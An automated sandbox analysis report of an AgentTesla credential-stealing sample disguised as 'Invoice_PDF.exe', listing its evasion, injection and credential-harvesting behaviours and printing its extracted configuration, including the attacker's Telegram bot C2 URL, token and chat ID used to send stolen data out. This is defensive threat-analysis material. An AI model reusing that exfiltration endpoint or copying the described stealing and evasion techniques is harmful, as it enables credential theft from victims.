Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Invoice_PDF.exe

Overview

General Information

Sample Name:Invoice_PDF.exe
Analysis ID:532735
MD5:1dcc43f272f66d8e5afe11e7276dd122
SHA1:cb6a88d1443e7cca944a4176e2a8ebc205f715e3
SHA256:0c6a99b9327cbcb0f3c5b18bc93d347ec8adcb3686e562c515ee4388713e8ed7
Tags:agentteslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Invoice_PDF.exe (PID: 6140 cmdline: "C:\Users\user\Desktop\Invoice_PDF.exe" MD5: 1DCC43F272F66D8E5AFE11E7276DD122)
    • Invoice_PDF.exe (PID: 5944 cmdline: C:\Users\user\Desktop\Invoice_PDF.exe MD5: 1DCC43F272F66D8E5AFE11E7276DD122)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.0.Invoice_PDF.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              3.0.Invoice_PDF.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                3.2.Invoice_PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.2.Invoice_PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    3.0.Invoice_PDF.exe.400000.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}
                      Source: Invoice_PDF.exe.5944.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Invoice_PDF.exeVirustotal: Detection: 45%Perma Link
                      Source: Invoice_PDF.exeMetadefender: Detection: 48%Perma Link
                      Source: Invoice_PDF.exeReversingLabs: Detection: 62%
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: Invoice_PDF.exeAvira: detected
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Invoice_PDF.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Invoice_PDF.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.2.Invoice_PDF.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Invoice_PDF.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Invoice_PDF.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: Invoice_PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2
                      Source: Invoice_PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6dHost: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: http://PHCGWf.com
                      Source: Invoice_PDF.exe, 00000003.00000002.527261346.00000000035B9000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: Invoice_PDF.exe, 00000003.00000002.529774678.0000000006EFE000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpString found in binary or memory: http://www.chinhdo.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comE8
                      Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                      Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.como
                      Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comoitu
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Invoice_PDF.exe, 00000003.00000002.527180057.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://87HMfkdDwCo1wEm.org
                      Source: Invoice_PDF.exe, 00000003.00000002.527027069.000000000354C000.00000004.00000001.sdmpString found in binary or memory: https://87HMfkdDwCo1wEm.orgx
                      Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/
                      Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentdocument-----
                      Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
                      Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6dHost: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: Invoice_PDF.exe
                      Source: initial sampleStatic PE information: Filename: Invoice_PDF.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b5029162Bu002d2D4Eu002d489Bu002d8212u002d1A5255E1EA59u007d/u0034695CF78u002d3B59u002d4037u002dB8EEu002dF86771E06890.csLarge array initialization: .cctor: array initializer size 12005
                      Source: Invoice_PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E2CBB4
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E2EFEA
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E2EFF8
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E26F21
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_0914521B
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09142260
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09146AB0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09146AC0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09146D10
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09221380
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01398560
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01390818
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0139C0FC
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0139E570
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0139B040
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01392BD0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01394698
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0176CDF0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0176DDA0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01768858
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01764B78
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0176A760
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01760297
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01765500
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0176A0B8
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E47A0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E3CCC
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E4750
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E4730
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E46F0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E46B0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E5490
                      Source: Invoice_PDF.exeBinary or memory string: OriginalFilename vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTransactionalFileManager.dllf# vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.282580770.0000000009150000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Invoice_PDF.exe
                      Source: Invoice_PDF.exeBinary or memory string: OriginalFilename vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000003.00000002.521181081.00000000012F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
                      Source: Invoice_PDF.exeBinary or memory string: OriginalFilenameOverlappedDa.exeB vs Invoice_PDF.exe
                      Source: Invoice_PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Invoice_PDF.exeVirustotal: Detection: 45%
                      Source: Invoice_PDF.exeMetadefender: Detection: 48%
                      Source: Invoice_PDF.exeReversingLabs: Detection: 62%
                      Source: Invoice_PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\Invoice_PDF.exe "C:\Users\user\Desktop\Invoice_PDF.exe"
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exe
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exe
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_PDF.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Invoice_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Invoice_PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: Invoice_PDF.exe, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.2.Invoice_PDF.exe.b90000.0.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.0.Invoice_PDF.exe.b90000.0.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.2.Invoice_PDF.exe.ed0000.1.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.11.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.5.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.13.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.9.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.1.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.7.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_00B972C2 push esi; iretd
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_00B95076 push bx; ret
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E28748 push 8802EC9Eh; iretd
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E21C67 push ebx; iretd
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E21C7C push ebx; iretd
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09143267 pushad ; ret
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_0922422D push FFFFFF8Bh; iretd
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_00ED72C2 push esi; iretd
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_00ED5076 push bx; ret
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_013997B0 pushad ; ret
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01769460 push ss; retf
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017ECF71 push esp; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.91118342624
